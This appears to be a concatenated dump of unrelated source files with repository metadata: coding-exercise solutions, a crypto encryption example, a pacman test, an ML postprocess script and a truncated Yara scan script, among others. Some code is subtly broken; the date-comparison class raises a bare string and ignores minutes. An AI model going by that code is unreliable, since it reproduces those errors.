"MIT"
] | null | null | null |
import os
try:
os.mkdir("data")
except FileExistsError:
print("Der Ordner data existiert bereits!")
try:
f = open("data/subdomains.txt", "r")
f.read()
f.close()
except FileNotFoundError:
print("Du must zuerst die Datei: subdomains.txt herunterladen! Kopiere sie nun in den Data ordner und starte das Programm erneut!")
taste = input("Verstanden?")
exit(-1)
except FileExistsError:
print("Der Data ordner existiert bereits!")
except:
print("Etwas ist schiefgelaufen!")
print("Setup Erfolgreich abgeschlossen! Nun kannst du die Subdomains Scan.py ausführen!")
| 29.52381 | 136 | 0.690323 |
8432ddb361abfcb045f207736cc6d68f5110e185
| 1,495 |
py
|
Python
|
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
time compare.py
|
aertoria/MiscCode
|
a2e94d0fe0890e6620972f84adcb7976ca9f1408
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
class DateObj(object):
def __init__(self, year, month, day, hour, minute, second, msec):
self.year = int(year)
self.month = int(month)
self.day = int(day)
self.hour = int(hour)
self.minute = int(minute)
self.second = int(second)
self.msec = int(msec)
self.ensure_valid()
def ensure_valid(self):
if self.month not in range(1,13): raise 'Error Month'
if self.day not in range(1,32): raise 'Error Day'
#one of the solution
class Solution():
def compare(self,d1,d2):
#print d1
if self.month_of(d1) > self.month_of(d2):
return d1
elif self.month_of(d1) < self.month_of(d2):
return d2
elif self.msec_of(d1) >= self.msec_of(d2):
return d1
else:
return d2
def month_of(self,date):
year = date.year
return 12 * year + date.month
def msec_of(self,date):
day = date.day
hour = 24*day + date.hour
second = 60*hour + date.second
return 1000*second + date.msec
#second solution
class Solution2():
def compare(self,d1,d2):
d1_list = [d1.year,d1.month,d1.day,d1.hour,d1.minute,d1.second,d1.msec]
d2_list = [d2.year,d2.month,d2.day,d2.hour,d2.minute,d2.second,d2.msec]
if d1_list <= d2_list:
return d1
return d2
#testcases
#1989-07-24 3:7:6.98
date1=DateObj(1989, 12, 24, 3, 7, 6, 98)
#1989-07-24 6:4:6.98
date2=DateObj(1989, 07, 24, 6, 4, 6, 98)
date3=DateObj(1989, 12, 24, 3, 7, 6, 98)
s = Solution2()
#print s.compare(date1,date2)
#print s.compare(date1,date3)
print date1.__dict__
| 21.985294 | 73 | 0.663545 |
8466cde7695bc3bc64772aec48025e37968c4e27
| 166 |
py
|
Python
|
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
Algorithms/Implementation/designer_pdf_viewer.py
|
rho2/HackerRank
|
4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266
|
[
"MIT"
] | null | null | null |
import string
h = list(map(int, input().split()))
word = input()
d = dict(zip(string.ascii_lowercase, h))
v = [d[c] for c in word]
w = max(v) * len(word)
print(w)
| 15.090909 | 40 | 0.620482 |
29ddd784009f4e4a9bd9dcb496f22ba1f0e58e50
| 336 |
py
|
Python
|
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Strings/find_a_string.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
def count_substring(string, sub_string):
l1 = len(string)
l2 = len(sub_string)
return len([i for i in range(0, l1 - l2 + 1) if (string[i:i+l2] == sub_string)])
if __name__ == '__main__':
string = input()
sub_string = input()
print(count_substring(string, sub_string))
| 19.764706 | 84 | 0.636905 |
d9e1818fa0119e9cdda4671be56751fe9e2f1744
| 2,672 |
py
|
Python
|
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | 2 |
2021-08-23T21:56:07.000Z
|
2022-01-20T13:52:19.000Z
|
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | null | null | null |
src/main/apps/mlops/utils/pipeline.py
|
Nouvellie/django-tflite
|
1d08fdc8a2ec58886d7d2b8d40e7b3598613caca
|
[
"MIT"
] | null | null | null |
import json
from collections import OrderedDict
from pathlib import Path
from typing import (
Generic,
List,
Optional,
Tuple,
TypeVar,
)
SELFCLASS = TypeVar('SELFCLASS')
FUNCTIONS_PIPELINE = OrderedDict()
def pipeline_function_register(func) -> None:
"""Add functions to the pipeline"""
if func.__name__ not in FUNCTIONS_PIPELINE:
FUNCTIONS_PIPELINE[func.__name__] = func
# print(f"{func.__name__} registered in Pipeline")
else:
raise Exception(f"Duplicated function with name {func.__name__}")
class Pipeline:
"""
Build a pipeline of functions
Pipeline structure: ("func_name", args, kwargs) or ("func_name", kwargs)
x -> Pipeline(x) -> new_x
"""
FUNCTIONS_PIPELINE = FUNCTIONS_PIPELINE
def __new__(cls, pipeline: Optional[List[Tuple[str, dict]]] = None, *args, **kwargs) -> Generic[SELFCLASS]:
return super(Pipeline, cls).__new__(cls, *args, **kwargs)
def __init__(self, pipeline: Optional[List[Tuple[str, dict]]] = None) -> None:
self.pipeline = pipeline if pipeline else []
def __call__(self, model_input: any) -> any:
"""Apply pipeline to the input 'x'."""
for pipe in self.pipeline:
func_name, *args, kwargs = pipe
assert isinstance(kwargs, dict), f"Wrong declaration in {func_name!r}. Must be (str, dict) or (str, tuple, dict)"
# Apply preprocessing. (args and kwargs provided)
if args:
model_input = self.apply(
model_input, func_name, *args, **kwargs)
else:
model_input = self.apply(model_input, func_name, **kwargs)
return model_input
@classmethod
def apply(cls, model_input: any, func_name: any, *args, **kwargs) -> any:
"""Compute func(x, *args, **kwargs)"""
if func_name in cls.FUNCTIONS_PIPELINE:
return cls.FUNCTIONS_PIPELINE[func_name](model_input, *args, **kwargs)
else:
raise TypeError(f"{func_name} not available!")
def from_json(self, preprocessing_path: str) -> None:
"""Gets the list of functions to be applied in the preprocess from a list in json."""
preprocessing_path = Path(preprocessing_path)
with open(str(preprocessing_path), "r", encoding="utf8") as pp:
pipeline = json.load(pp)
self.pipeline = pipeline
# print("\n", f"Pipeline loaded from {preprocessing_path!r}")
def is_available(self, func_name: str) -> bool:
"""Return True if the function 'func_name' is available in Pipeline"""
return True if func_name in self.FUNCTIONS_PIPELINE else False
| 34.701299 | 125 | 0.640719 |
d9e5e0743392171022fdbc998a69f23466bd548a
| 224 |
py
|
Python
|
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
PYTHON/Sets/set_union_oper.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
if __name__ == '__main__':
i = int(input())
A = set(map(int, input().split()))
j = int(input())
B = set(map(int, input().split()))
res = A.union(B)
print(len(res))
| 18.666667 | 38 | 0.544643 |
8a4e867ab5d50eaffd7b2f7d85daebbbb4a62b1f
| 765 |
py
|
Python
|
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | 2 |
2019-12-10T10:25:11.000Z
|
2021-01-26T13:59:40.000Z
|
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | null | null | null |
v401/python/rechnung.py
|
chrbeckm/anfaenger-praktikum
|
51764ff23901de1bc3d16dc935acfdc66bb2b2b7
|
[
"MIT"
] | 1 |
2020-12-06T21:24:58.000Z
|
2020-12-06T21:24:58.000Z
|
import numpy as np
import uncertainties.unumpy as unumpy
from uncertainties import ufloat
from scipy.stats import sem
print('Wellenlaenge')
dd1, za = np.genfromtxt('python/wellenlaenge.txt', unpack=True)
dd = (dd1*10**(-3))/5.017
lam = 2 * dd / za
mlam = np.mean(lam)
slam = sem(lam)
rlam = ufloat(mlam, slam)
np.savetxt('build/wellenlaenge.txt', np.column_stack([dd1, dd, za, lam]), header='dd1, dd, za, lam')
print('Vakuum')
dp, zb = np.genfromtxt('python/vakuum.txt', unpack=True)
dn = zb * 650*10**(-9) / (2 * 0.05)
mdn = np.mean(dn)
sdn = sem(dn)
rdn = ufloat(mdn, sdn)
n = 1 + rdn * 295.15 * 1.0132 / (273.15*0.8)
print('rlam =',rlam)
print('rdn =',rdn)
print('n =',n)
np.savetxt('build/vakuum.txt', np.column_stack([dp, zb, dn]), header='dp, zb, delta n')
| 29.423077 | 100 | 0.662745 |
8a6097d433c6982ea17e36743e348c77321aeb64
| 4,499 |
py
|
Python
|
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
examples/chk-enc.py
|
jadeblaquiere/pyfspke
|
1c7305e8a28639e55b1620e731a5dd7c312c295b
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2017, Joseph deBlaquiere <[email protected]>
# All rights reserved
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of ecpy nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pypbc
from fspke.chk import CHKPublicKey
from argparse import ArgumentParser
import base64
import sys
from hashlib import sha256
import Crypto.Random as Random
from Crypto.Cipher import AES
from Crypto.Util import Counter
import asn1
def bxor(b1, b2): # use xor for bytes
parts = []
for b1, b2 in zip(b1, b2):
parts.append(bytes([b1 ^ b2]))
return b''.join(parts)
desc = ('chk-enc encrypts a message using AES encryption based on a '
'random key and then encrypts that random key using the CHK '
'forward secure encryption scheme. Output is DER encoded '
'and PEM-wrapped')
parser = ArgumentParser(description=desc)
parser.add_argument('pubkey', help='file path for file containing public key')
parser.add_argument('--interval', type=int, default=0, help='interval value to encrypt for')
parser.add_argument('-f', '--file', default=None, help='read message plaintext from file instead of stdin')
clargs = parser.parse_args()
with open(clargs.pubkey, 'r') as keyfile:
PEMkey=keyfile.read()
DERkey = base64.b64decode(PEMkey.split('-----')[2].encode())
try:
pubkey = CHKPublicKey.publicKeyFromDER(DERkey)
except ValueError:
sys.exit('Error: Unable to import public key, aborting.')
if pubkey is None:
sys.exit('Error: Unable to import public key, aborting.')
if clargs.file is None:
message = sys.stdin.read()
else:
with open(clargs.file, 'r') as msgfile:
message=msgfile.read()
if (message is None) or (len(message) == 0):
sys.exit('Error: Plaintext length 0, aborting.')
# generate a random 256 bit key for encryption, 128 bit counter for MODE_CTR
AESkey = Random.new().read(32)
# counter starts at 1... Secure so long as we don't re-use the key
counter = Counter.new(128)
aescipher = AES.new(AESkey, AES.MODE_CTR, counter=counter)
# encrypt message (symmetric encryption)
aes_ct = aescipher.encrypt(message)
# because the plaintext space of the CHK algorithm is point coordinates
# we generate a secure random key, hash to get a byte string and use that
# as a one time pad to encrypt the AES key (by XOR)
# generate a random message for CHK (which is a point in Fp2)
chk_pt = pubkey.gt * Random.random.randint(1,pubkey.r)
# hash to create a string from point coordinates
randhash = sha256(str(chk_pt).encode()).digest()
assert len(randhash) == len(AESkey)
xorkey = bxor(AESkey, randhash)
# encode random element using CHK BTE algorithm
chk_ct = pubkey.Enc_DER(chk_pt, clargs.interval)
# encode PKE encrypted key, xor key, aes ciphertext in DER
encoder = asn1.Encoder()
encoder.start()
encoder.enter(asn1.Numbers.Sequence)
encoder.write(chk_ct, asn1.Numbers.OctetString)
encoder.write(xorkey, asn1.Numbers.OctetString)
encoder.write(aes_ct, asn1.Numbers.OctetString)
encoder.leave()
DERmsg = encoder.output()
print('-----BEGIN CHK ENCRYPTED MESSAGE-----')
print(base64.b64encode(DERmsg).decode())
print('-----END CHK ENCRYPTED MESSAGE-----')
| 39.464912 | 107 | 0.750389 |
0ac99080ea9b97aa5eb8cf1f9863ba84b15da3f5
| 523 |
py
|
Python
|
pacman-arch/test/pacman/tests/xfercommand001.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/xfercommand001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/xfercommand001.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Quick check for using XferCommand"
# this setting forces us to download packages
self.cachepkgs = False
#wget doesn't support file:// urls. curl does
self.option['XferCommand'] = ['/usr/bin/curl %u -o %o']
numpkgs = 10
pkgnames = []
for i in range(numpkgs):
name = "pkg_%s" % i
pkgnames.append(name)
p = pmpkg(name)
p.files = ["usr/bin/foo-%s" % i]
self.addpkg2db("sync", p)
self.args = "-S %s" % ' '.join(pkgnames)
for name in pkgnames:
self.addrule("PKG_EXIST=%s" % name)
| 24.904762 | 55 | 0.646272 |
6b2841e62fab3089b25520d511fea6a815878b79
| 872 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/tests/ch06_arrays/ex04_rotation_test.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
from ch06_arrays.solutions.ex04_rotate_inplace import rotate_inplace
def test_rotation():
values = [['1', '2', '3', '4', '5', '6'],
['J', 'K', 'L', 'M', 'N', '7'],
['I', 'V', 'W', 'X', 'O', '8'],
['H', 'U', 'Z', 'Y', 'P', '9'],
['G', 'T', 'S', 'R', 'Q', '0'],
['F', 'E', 'D', 'C', 'B', 'A']]
rotate_inplace(values)
expected = [to_list("F G H I J 1"),
to_list("E T U V K 2"),
to_list("D S Z W L 3"),
to_list("C R Y X M 4"),
to_list("B Q P O N 5"),
# so sähe es von Hand aus
list("A 0 9 8 7 6".replace(" ", ""))]
assert values == expected
def to_list(text):
return list(text.replace(" ", ""))
| 28.129032 | 68 | 0.426606 |
6b4321b71e025727969edbd03c6de2879bf645f0
| 400 |
py
|
Python
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 5 |
2018-02-06T22:48:34.000Z
|
2020-01-07T20:19:05.000Z
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 11 |
2018-01-31T21:47:49.000Z
|
2018-04-21T16:42:52.000Z
|
server/ImageProcessor.py
|
Thukor/MazeSolver
|
c953e193ce27a7348e8ec9c5592144426dfce193
|
[
"MIT"
] | 2 |
2020-06-18T05:40:03.000Z
|
2022-02-02T03:46:30.000Z
|
from image_processing import *
"""
Processor Class for images
"""
class ImageProcessor:
#initialize strategies
def __init__(self,strategies):
self.strategies = [birdseye_correction, image_segmentation]
#We interpret each set of processing functions as strategies.
def process_image(image_name, number):
birdseye_correction(image_name, number)
image_segmentation("warped.png", number)
| 22.222222 | 62 | 0.7875 |
863774c95b28b062d1596f079abc8fa6527db92b
| 3,444 |
py
|
Python
|
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 1 |
2021-11-18T08:17:44.000Z
|
2021-11-18T08:17:44.000Z
|
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | null | null | null |
research/cv/resnetv2/postprocess.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 2 |
2019-09-01T06:17:04.000Z
|
2019-10-04T08:39:45.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""postprocess"""
import os
import json
import argparse
import numpy as np
from mindspore.nn import Top1CategoricalAccuracy, Top5CategoricalAccuracy
parser = argparse.ArgumentParser(description="postprocess")
parser.add_argument("--dataset", type=str, required=True, help="dataset type.")
parser.add_argument("--result_path", type=str, required=True, help="result files path.")
parser.add_argument("--label_path", type=str, required=True, help="image file path.")
args_opt = parser.parse_args()
if args_opt.dataset == "cifar10":
from src.config import config1 as config
elif args_opt.dataset == "cifar100":
from src.config import config2 as config
elif args_opt.dataset == 'imagenet2012':
from src.config import config3 as config
else:
raise ValueError("dataset is not support.")
def cal_acc_cifar(result_path, label_path):
'''calculate cifar accuracy'''
top1_acc = Top1CategoricalAccuracy()
top5_acc = Top5CategoricalAccuracy()
result_shape = (config.batch_size, config.class_num)
file_num = len(os.listdir(result_path))
label_list = np.load(label_path)
for i in range(file_num):
f_name = args_opt.dataset + "_bs" + str(config.batch_size) + "_" + str(i) + "_0.bin"
full_file_path = os.path.join(result_path, f_name)
if os.path.isfile(full_file_path):
result = np.fromfile(full_file_path, dtype=np.float32).reshape(result_shape)
gt_classes = label_list[i]
top1_acc.update(result, gt_classes)
top5_acc.update(result, gt_classes)
print("top1 acc: ", top1_acc.eval())
print("top5 acc: ", top5_acc.eval())
def cal_acc_imagenet(result_path, label_path):
'''calculate imagenet2012 accuracy'''
batch_size = 1
files = os.listdir(result_path)
with open(label_path, "r") as label:
labels = json.load(label)
top1 = 0
top5 = 0
total_data = len(files)
for file in files:
img_ids_name = file.split('_0.')[0]
data_path = os.path.join(result_path, img_ids_name + "_0.bin")
result = np.fromfile(data_path, dtype=np.float32).reshape(batch_size, config.class_num)
for batch in range(batch_size):
predict = np.argsort(-result[batch], axis=-1)
if labels[img_ids_name+".JPEG"] == predict[0]:
top1 += 1
if labels[img_ids_name+".JPEG"] in predict[:5]:
top5 += 1
print(f"Total data: {total_data}, top1 accuracy: {top1/total_data}, top5 accuracy: {top5/total_data}.")
if __name__ == '__main__':
if args_opt.dataset.lower() == "cifar10" or args_opt.dataset.lower() == "cifar100":
cal_acc_cifar(args_opt.result_path, args_opt.label_path)
else:
cal_acc_imagenet(args_opt.result_path, args_opt.label_path)
| 40.517647 | 107 | 0.680894 |
8134bc20032a9dd817a62a85d41ffcd0df8b8b33
| 752 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/crm/report/lead_owner_efficiency/lead_owner_efficiency.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2013, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from erpnext.crm.report.campaign_efficiency.campaign_efficiency import get_lead_data
def execute(filters=None):
columns, data = [], []
columns=get_columns()
data=get_lead_data(filters, "Lead Owner")
return columns, data
def get_columns():
return [
_("Lead Owner") + ":Data:130",
_("Lead Count") + ":Int:80",
_("Opp Count") + ":Int:80",
_("Quot Count") + ":Int:80",
_("Order Count") + ":Int:100",
_("Order Value") + ":Float:100",
_("Opp/Lead %") + ":Float:100",
_("Quot/Lead %") + ":Float:100",
_("Order/Quot %") + ":Float:100"
]
| 28.923077 | 84 | 0.668883 |
d4c3e9db7049c36d883300456029172d1713deb3
| 399 |
py
|
Python
|
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | 1 |
2020-03-24T04:26:34.000Z
|
2020-03-24T04:26:34.000Z
|
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
web/controllers/api/__init__.py
|
yao6891/FlaskOrdering
|
cbd24bd8d95afaba91ce4d6b1b3548c4e82e3807
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
route_api = Blueprint( 'api_page',__name__ )
from web.controllers.api.Member import *
from web.controllers.api.Food import *
from web.controllers.api.Order import *
from web.controllers.api.My import *
from web.controllers.api.Cart import *
from web.controllers.api.Address import *
@route_api.route("/")
def index():
return "Mina Api V1.0~~"
| 30.692308 | 44 | 0.741855 |
580517f64b701b2811884caa070d2d05b34578b8
| 7,281 |
py
|
Python
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Yara/Scripts/YaraScan/YaraScan.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import demistomock as demisto
from CommonServerPython import *
# The script uses the Python yara library to scan a file or files
''' IMPORTS '''
import yara
''' GLOBAL VARIABLES '''
yaraLogo = "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